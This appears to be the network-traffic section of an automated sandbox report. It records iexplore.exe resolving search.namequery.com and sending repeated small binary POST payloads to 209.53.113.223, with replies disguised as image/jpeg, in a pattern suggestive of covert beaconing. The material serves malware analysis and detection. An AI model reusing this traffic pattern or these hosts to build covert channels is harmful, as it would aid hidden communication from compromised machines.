Oct 7, 2021 21:23:52.325102091 CEST | 49777 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:52.334279060 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:52.494050026 CEST | 80 | 49777 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:52.494151115 CEST | 49777 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:52.501471996 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:52.501490116 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:52.501550913 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:55.245099068 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:55.409693003 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:55.410012007 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:55.410186052 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:58.793450117 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:58.957880020 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:58.961870909 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:58.962007046 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:01.556579113 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:01.721520901 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:01.721555948 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:01.723252058 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:02.661020041 CEST | 80 | 49777 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:04.566550970 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:04.732942104 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:04.736144066 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:04.736267090 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:07.688574076 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:07.853148937 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:07.853244066 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:07.853488922 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:10.701740026 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:10.868128061 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:10.868566036 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:10.868704081 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:14.042638063 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:14.208025932 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:14.208306074 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:14.211158037 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:18.016602039 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:18.181540012 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:18.181561947 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:18.181735992 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:21.763349056 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:21.927870989 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:21.928241968 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:21.928397894 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:25.734289885 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:25.899812937 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:25.899960041 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:25.900111914 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:29.996057034 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:30.161999941 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:30.162039042 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:30.164705038 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:34.309190035 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:34.474737883 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:34.474775076 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:34.475105047 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:38.880202055 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:39.046004057 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:39.046675920 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:39.046857119 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:43.247143030 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:43.412929058 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:43.412971020 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:43.413635015 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:47.711169004 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:47.875978947 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:47.876355886 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:47.879224062 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:52.448729992 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:52.613265991 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:52.613306999 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:52.613403082 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:56.969779968 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:24:57.134373903 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:57.134449005 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:24:57.134566069 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:01.821006060 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:01.986320972 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:01.986378908 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:01.986567974 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:07.321844101 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:07.486608982 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:07.486897945 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:07.487004995 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:13.436945915 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:13.603472948 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:13.603702068 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:13.603790045 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:19.799179077 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:19.964773893 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:19.964886904 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:19.964986086 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:25.084517002 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:25.249380112 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:25.250766039 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:25.250893116 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:30.098042011 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:30.262486935 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:30.263022900 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:30.263139009 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:34.989511967 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:35.153960943 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:35.154505014 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:35.154577017 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:40.120321989 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:40.285154104 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:40.285434961 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:40.285594940 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:47.435595036 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:47.601798058 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:47.601965904 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:47.602138042 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:47.605307102 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:47.769669056 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:47.770154953 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:47.770273924 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:47.772880077 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:47.937578917 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:47.937879086 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:47.937968969 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:47.940663099 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.106579065 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.106636047 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.106715918 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.111125946 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.275595903 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.275963068 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.276094913 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.279582024 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.445183992 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.445363045 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.445460081 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.447550058 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.611929893 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.612135887 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.612261057 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.614590883 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.778891087 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.780464888 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.780580044 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.783839941 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.949501991 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.950016022 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:48.950129032 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:48.952986956 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.117523909 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.117723942 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.117795944 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.120628119 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.287014961 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.287314892 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.287487984 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.289769888 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.454377890 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.455056906 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.455241919 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.459754944 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.624169111 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.626085043 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.626319885 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.630515099 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.795279026 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.795301914 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.796037912 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.801758051 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.966447115 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.966474056 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:49.966594934 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:49.969285965 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:50.133919001 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:50.134128094 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:50.134207964 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:50.136079073 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:50.300545931 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:50.306108952 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:50.306225061 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:50.308320999 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:50.473483086 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:50.473535061 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:50.474477053 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:50.476890087 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:25:50.641442060 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:50.641959906 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:25:50.642256021 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:50.646055937 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:50.810672998 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:50.810699940 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:50.810776949 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:50.813941956 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:50.978307962 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:50.978565931 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:50.978688955 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:50.982218981 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.146894932 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.147799969 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.147905111 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.150238991 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.314743042 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.314759016 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.314917088 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.317600965 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.482126951 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.482516050 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.482656002 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.486161947 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.650952101 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.651395082 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.654476881 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.654524088 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.820060968 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.820671082 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.820923090 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.827167988 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.991677999 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.991864920 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:51.992007971 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:51.995599031 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:52.161282063 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:52.162159920 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:52.162637949 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:52.169229031 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:52.333755016 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:52.333781004 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:25:52.335308075 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:25:52.339021921 CEST4977580192.168.2.4209.53.113.223
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2021 21:23:45.459295034 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
Oct 7, 2021 21:23:45.479554892 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 7, 2021 21:23:45.459295034 CEST | 192.168.2.4 | 8.8.8.8 | 0xa868 | Standard query (0) | search.namequery.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 7, 2021 21:23:45.479554892 CEST | 8.8.8.8 | 192.168.2.4 | 0xa868 | No error (0) | search.namequery.com | | 209.53.113.223 | A (IP address) | IN (0x0001)
Oct 7, 2021 21:23:55.461390972 CEST | 8.8.8.8 | 192.168.2.4 | 0x52b2 | No error (0) | a-0019.a.dns.azurefd.net | a-0019.standard.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
  • search.namequery.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49775 | 209.53.113.223 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Oct 7, 2021 21:23:48.328999996 CEST | 1148 | OUT | POST / HTTP/1.1
TagId: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Oct 7, 2021 21:23:48.602479935 CEST | 1149 | IN | HTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e ff ff ff ff 04 00 60 20 1b 80 08 0a 2b 7e 0d 0a
Data Ascii: ~` +~
Oct 7, 2021 21:23:52.334279060 CEST | 1149 | OUT | POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 19
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 60 20 1b 80 04 00 dd 80 fe ff 09 4f bd 7e
Data Ascii: ~` ` O~
Oct 7, 2021 21:23:52.501490116 CEST | 1150 | IN | HTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 575
Connection: Keep-Alive
TagId: -2145705888
Oct 7, 2021 21:23:55.245099068 CEST | 1534 | OUT | POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 9
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 1a 35 e3 7e
Data Ascii: ~` 5~
Oct 7, 2021 21:23:55.410012007 CEST | 1673 | IN | HTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 248
Connection: Keep-Alive
TagId: -2145705888
Oct 7, 2021 21:23:58.793450117 CEST | 2631 | OUT | POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 409
TagId: -2145705888
Oct 7, 2021 21:23:58.961870909 CEST | 2632 | IN | HTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 574
Connection: Keep-Alive
TagId: -2145705888
Oct 7, 2021 21:24:01.556579113 CEST | 2632 | OUT | POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 9
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 3c 71 47 7e
Data Ascii: ~` <qG~
Oct 7, 2021 21:24:01.721555948 CEST | 2633 | IN | HTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 248
Connection: Keep-Alive
TagId: -2145705888
Oct 7, 2021 21:24:04.566550970 CEST | 2634 | OUT | POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 407
TagId: -2145705888
Oct 7, 2021 21:24:04.736144066 CEST | 2634 | IN | HTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e fd 78 3f 91 0b 02 4a 1d bd 90 5d fd 57 7e 0d 0a
Data Ascii: ~x?J]W~
Oct 7, 2021 21:24:07.688574076 CEST | 2634 | OUT | POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 31
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 36 1c 44 f2 60 20 1b 80 0c 00 09 97 d3 31 f0 a6 bf a7 d3 fc 3b fb 5e 2c 3f 7e
Data Ascii: ~` 6D` 1;^,?~
Oct 7, 2021 21:24:07.853244066 CEST | 2635 | IN | HTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 9a f0 6f 4e 76 5e e0 65 91 b3 6e 6f 78 7e 0d 0a
Data Ascii: ~oNv^enox~
Oct 7, 2021 21:24:10.701740026 CEST | 2635 | OUT | POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 33 3e 43 6a 36 1c 44 f2 04 00 c9 64 a4 e8 6f 94 66 7e
Data Ascii: ~` 3>Cj6Ddof~
Oct 7, 2021 21:24:10.868566036 CEST | 2635 | IN | HTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 29
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e ac bf 1a 57 0b 60 2d 26 8f 0f f6 20 77 fa c6 9e f1 cf 61 45 c0 a5 7f d1 8b 7e 0d 0a
Data Ascii: ~W`-& waE~
Oct 7, 2021 21:24:14.042638063 CEST | 2635 | OUT | POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 25
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 7d 5d d8 d1 7d 5e 33 3e 43 6a 04 00 fa 8d 78 14 78 06 9d 7e
Data Ascii: ~` }]}^3>Cjxx~
Oct 7, 2021 21:24:14.208306074 CEST | 2636 | IN | HTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 19
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 60 d6 54 52 e3 8d 6c 46 17 35 a0 6f 08 57 8a 7e 0d 0a
Data Ascii: ~`TRlF5oW~
Oct 7, 2021 21:24:18.016602039 CEST | 2636 | OUT | POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 26
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 db 18 7d 5d 09 7d 5d d8 d1 7d 5e 04 00 81 f4 98 6a 09 09 9e 7e
Data Ascii: ~` }]}]}^j~
